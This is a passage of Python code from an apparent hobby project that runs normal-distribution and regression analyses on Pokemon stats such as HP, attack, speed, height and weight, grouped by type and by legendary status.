stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['attack']
stat_stats = loaddata.legendary_ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['defense']
stat_stats = loaddata.legendary_ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['sp_attack']
stat_stats = loaddata.legendary_ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ice_types['sp_defense']
stat_stats = loaddata.legendary_ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_ice_types['height_m']
stat_stats = loaddata.legendary_ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_ice_types['weight_kg']
stat_stats = loaddata.legendary_ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_dragon_types['total_points']
stat_stats = loaddata.legendary_dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['hp']
stat_stats = loaddata.legendary_dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['speed']
stat_stats = loaddata.legendary_dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['attack']
stat_stats = loaddata.legendary_dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['defense']
stat_stats = loaddata.legendary_dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['sp_attack']
stat_stats = loaddata.legendary_dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dragon_types['sp_defense']
stat_stats = loaddata.legendary_dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_dragon_types['height_m']
stat_stats = loaddata.legendary_dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_dragon_types['weight_kg']
stat_stats = loaddata.legendary_dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_dark_types['total_points']
stat_stats = loaddata.legendary_dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['hp']
stat_stats = loaddata.legendary_dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['speed']
stat_stats = loaddata.legendary_dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['attack']
stat_stats = loaddata.legendary_dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['defense']
stat_stats = loaddata.legendary_dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['sp_attack']
stat_stats = loaddata.legendary_dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_dark_types['sp_defense']
stat_stats = loaddata.legendary_dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_dark_types['height_m']
stat_stats = loaddata.legendary_dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_dark_types['weight_kg']
stat_stats = loaddata.legendary_dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_fairy_types['total_points']
stat_stats = loaddata.legendary_fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['hp']
stat_stats = loaddata.legendary_fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['speed']
stat_stats = loaddata.legendary_fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['attack']
stat_stats = loaddata.legendary_fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['defense']
stat_stats = loaddata.legendary_fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['sp_attack']
stat_stats = loaddata.legendary_fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fairy_types['sp_defense']
stat_stats = loaddata.legendary_fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_fairy_types['height_m']
stat_stats = loaddata.legendary_fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_fairy_types['weight_kg']
stat_stats = loaddata.legendary_fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_normal_types['total_points']
stat_stats = loaddata.legendary_normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['hp']
stat_stats = loaddata.legendary_normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['speed']
stat_stats = loaddata.legendary_normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['attack']
stat_stats = loaddata.legendary_normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['defense']
stat_stats = loaddata.legendary_normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['sp_attack']
stat_stats = loaddata.legendary_normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['sp_defense']
stat_stats = loaddata.legendary_normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_normal_types['height_m']
stat_stats = loaddata.legendary_normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_normal_types['weight_kg']
stat_stats = loaddata.legendary_normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_fighting_types['total_points']
stat_stats = loaddata.legendary_fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['hp']
stat_stats = loaddata.legendary_fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['speed']
stat_stats = loaddata.legendary_fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['attack']
stat_stats = loaddata.legendary_fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['defense']
stat_stats = loaddata.legendary_fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['sp_attack']
stat_stats = loaddata.legendary_fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['sp_defense']
stat_stats = loaddata.legendary_fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_fighting_types['height_m']
stat_stats = loaddata.legendary_fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_fighting_types['weight_kg']
stat_stats = loaddata.legendary_fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_flying_types['total_points']
stat_stats = loaddata.legendary_flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['hp']
stat_stats = loaddata.legendary_flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['speed']
stat_stats = loaddata.legendary_flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['attack']
stat_stats = loaddata.legendary_flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['defense']
stat_stats = loaddata.legendary_flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['sp_attack']
stat_stats = loaddata.legendary_flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['sp_defense']
stat_stats = loaddata.legendary_flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_flying_types['height_m']
stat_stats = loaddata.legendary_flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_flying_types['weight_kg']
stat_stats = loaddata.legendary_flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_poison_types['total_points']
stat_stats = loaddata.legendary_poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['hp']
stat_stats = loaddata.legendary_poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['speed']
stat_stats = loaddata.legendary_poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['attack']
stat_stats = loaddata.legendary_poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['defense']
stat_stats = loaddata.legendary_poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['sp_attack']
stat_stats = loaddata.legendary_poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['sp_defense']
stat_stats = loaddata.legendary_poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_poison_types['height_m']
stat_stats = loaddata.legendary_poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_poison_types['weight_kg']
stat_stats = loaddata.legendary_poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_ground_types['total_points']
stat_stats = loaddata.legendary_ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['hp']
stat_stats = loaddata.legendary_ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['speed']
stat_stats = loaddata.legendary_ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['attack']
stat_stats = loaddata.legendary_ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['defense']
stat_stats = loaddata.legendary_ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['sp_attack']
stat_stats = loaddata.legendary_ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['sp_defense']
stat_stats = loaddata.legendary_ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_ground_types['height_m']
stat_stats = loaddata.legendary_ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_ground_types['weight_kg']
stat_stats = loaddata.legendary_ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_rock_types['total_points']
stat_stats = loaddata.legendary_rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['hp']
stat_stats = loaddata.legendary_rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['speed']
stat_stats = loaddata.legendary_rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['attack']
stat_stats = loaddata.legendary_rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['defense']
stat_stats = loaddata.legendary_rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['sp_attack']
stat_stats = loaddata.legendary_rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['sp_defense']
stat_stats = loaddata.legendary_rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_rock_types['height_m']
stat_stats = loaddata.legendary_rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_rock_types['weight_kg']
stat_stats = loaddata.legendary_rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_bug_types['total_points']
stat_stats = loaddata.legendary_bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['hp']
stat_stats = loaddata.legendary_bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['speed']
stat_stats = loaddata.legendary_bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['attack']
stat_stats = loaddata.legendary_bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['defense']
stat_stats = loaddata.legendary_bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['sp_attack']
stat_stats = loaddata.legendary_bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['sp_defense']
stat_stats = loaddata.legendary_bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_bug_types['height_m']
stat_stats = loaddata.legendary_bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_bug_types['weight_kg']
stat_stats = loaddata.legendary_bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_ghost_types['total_points']
stat_stats = loaddata.legendary_ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['hp']
stat_stats = loaddata.legendary_ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['speed']
stat_stats = loaddata.legendary_ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['attack']
stat_stats = loaddata.legendary_ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['defense']
stat_stats = loaddata.legendary_ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['sp_attack']
stat_stats = loaddata.legendary_ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['sp_defense']
stat_stats = loaddata.legendary_ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_ghost_types['height_m']
stat_stats = loaddata.legendary_ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_ghost_types['weight_kg']
stat_stats = loaddata.legendary_ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_steel_types['total_points']
stat_stats = loaddata.legendary_steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['hp']
stat_stats = loaddata.legendary_steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['speed']
stat_stats = loaddata.legendary_steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['attack']
stat_stats = loaddata.legendary_steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['defense']
stat_stats = loaddata.legendary_steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['sp_attack']
stat_stats = loaddata.legendary_steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['sp_defense']
stat_stats = loaddata.legendary_steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_steel_types['height_m']
stat_stats = loaddata.legendary_steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_steel_types['weight_kg']
stat_stats = loaddata.legendary_steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon (trimmed h & w)
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_total_points
stat_stats = loaddata.legendary_total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_hp
stat_stats = loaddata.legendary_hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_speed
stat_stats = loaddata.legendary_speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_attack
stat_stats = loaddata.legendary_attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_defense
stat_stats = loaddata.legendary_defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_sp_attack
stat_stats = loaddata.legendary_sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_sp_defense
stat_stats = loaddata.legendary_sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_height
stat_stats = loaddata.legendary_height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_weight
stat_stats = loaddata.legendary_weight_stats
unit = '(kg)'
else:
return
else:
return
else:
return
# grass pokemon
if type_set == "1":
set_type = "Grass Type "
# fire pokemon
elif type_set == "2":
set_type = "Fire Type "
# water pokemon
elif type_set == "3":
set_type = "Water Type "
# electric pokemon
elif type_set == "4":
set_type = "Electric Type "
# psychic pokemon
elif type_set == "5":
set_type = "Psychic Type "
# ice pokemon
elif type_set == "6":
set_type = "Ice Type "
# dragon pokemon
elif type_set == "7":
set_type = "Dragon Type "
# dark pokemon
elif type_set == "8":
set_type = "Dark Type "
# fairy pokemon
elif type_set == "9":
set_type = "Fairy Type "
# normal pokemon
elif type_set == "10":
set_type = "Normal Type "
# fighting pokemon
elif type_set == "11":
set_type = "Fighting Type "
# flying pokemon
elif type_set == "12":
set_type = "Flying Type "
# poison pokemon
elif type_set == "13":
set_type = "Poison Type "
# ground pokemon
elif type_set == "14":
set_type = "Ground Type "
# rock pokemon
elif type_set == "15":
set_type = "Rock Type "
# bug pokemon
elif type_set == "16":
set_type = "Bug Type "
# ghost pokemon
elif type_set == "17":
set_type = "Ghost Type "
# steel pokemon
elif type_set == "18":
set_type = "Steel Type "
# all pokemon
else:
set_type = ''
pokemon_normal_dist_and_actual_vals.run_normal_dist_vs_actual(stat_values, stat_stats, test_bounds, set_name,
stat_name, unit, modifier, set_type)
return
def do_regression_analysis_non_legendary(option):
    """Run a regression analysis over the selected non-legendary data set.

    Parameters
    ----------
    option : str
        Menu choice: "1"-"18" select a single Pokemon type, "19" selects
        all non-legendary Pokemon.  Any other value is silently ignored
        (the function simply returns without running an analysis).

    Returns
    -------
    None
    """
    # Menu option -> (display name, loaddata attribute key).  The per-type
    # data sets in loaddata follow a strict naming convention
    # ('non_legendary_<key>_types' / 'z_non_legendary_<key>'), so a lookup
    # table replaces the former 19-branch if/elif chain.
    type_table = {
        "1": ("Grass Type", "grass"),
        "2": ("Fire Type", "fire"),
        "3": ("Water Type", "water"),
        "4": ("Electric Type", "electric"),
        "5": ("Psychic Type", "psychic"),
        "6": ("Ice Type", "ice"),
        "7": ("Dragon Type", "dragon"),
        "8": ("Dark Type", "dark"),
        "9": ("Fairy Type", "fairy"),
        "10": ("Normal Type", "normal"),
        "11": ("Fighting Type", "fighting"),
        "12": ("Poison Type", "poison") if False else ("Flying Type", "flying"),
        "13": ("Poison Type", "poison"),
        "14": ("Ground Type", "ground"),
        "15": ("Rock Type", "rock"),
        "16": ("Bug Type", "bug"),
        "17": ("Ghost Type", "ghost"),
        "18": ("Steel Type", "steel"),
    }
    if option in type_table:
        set_name, key = type_table[option]
        set_data = getattr(loaddata, 'non_legendary_{}_types'.format(key))
        z_set_data = getattr(loaddata, 'z_non_legendary_{}'.format(key))
    elif option == "19":  # all non-legendary pokemon (irregular attribute names)
        set_name = "Pokemon"
        set_data = loaddata.non_legendary_pokemon
        z_set_data = loaddata.z_pokemon_non_legendary
    else:
        return
    pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, modified_data_tag='(non legendary)')
    return
def do_regression_analysis_legendary(option):
    """Run a regression analysis over the selected legendary data set.

    Parameters
    ----------
    option : str
        Menu choice: "1"-"18" select a single Pokemon type, "19" selects
        all legendary Pokemon.  Any other value is silently ignored
        (the function simply returns without running an analysis).

    Returns
    -------
    None
    """
    # Menu option -> (display name, loaddata attribute key).  The per-type
    # data sets in loaddata follow a strict naming convention
    # ('legendary_<key>_types' / 'z_legendary_<key>'), so a lookup table
    # replaces the former 19-branch if/elif chain.
    type_table = {
        "1": ("Grass Type", "grass"),
        "2": ("Fire Type", "fire"),
        "3": ("Water Type", "water"),
        "4": ("Electric Type", "electric"),
        "5": ("Psychic Type", "psychic"),
        "6": ("Ice Type", "ice"),
        "7": ("Dragon Type", "dragon"),
        "8": ("Dark Type", "dark"),
        "9": ("Fairy Type", "fairy"),
        "10": ("Normal Type", "normal"),
        "11": ("Fighting Type", "fighting"),
        "12": ("Flying Type", "flying"),
        "13": ("Poison Type", "poison"),
        "14": ("Ground Type", "ground"),
        "15": ("Rock Type", "rock"),
        "16": ("Bug Type", "bug"),
        "17": ("Ghost Type", "ghost"),
        "18": ("Steel Type", "steel"),
    }
    if option in type_table:
        set_name, key = type_table[option]
        set_data = getattr(loaddata, 'legendary_{}_types'.format(key))
        z_set_data = getattr(loaddata, 'z_legendary_{}'.format(key))
    elif option == "19":  # all legendary pokemon (irregular attribute names)
        set_name = "Pokemon"
        set_data = loaddata.legendary_pokemon
        z_set_data = loaddata.z_pokemon_legendary
    else:
        return
    pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, modified_data_tag='(legendary)')
    return
def do_regression_analysis_trimmed(option):
    """Run a regression analysis over a trimmed (outlier-reduced) data set.

    Parameters
    ----------
    option : str
        Menu choice: "1"-"18" select a single Pokemon type (trimmed on
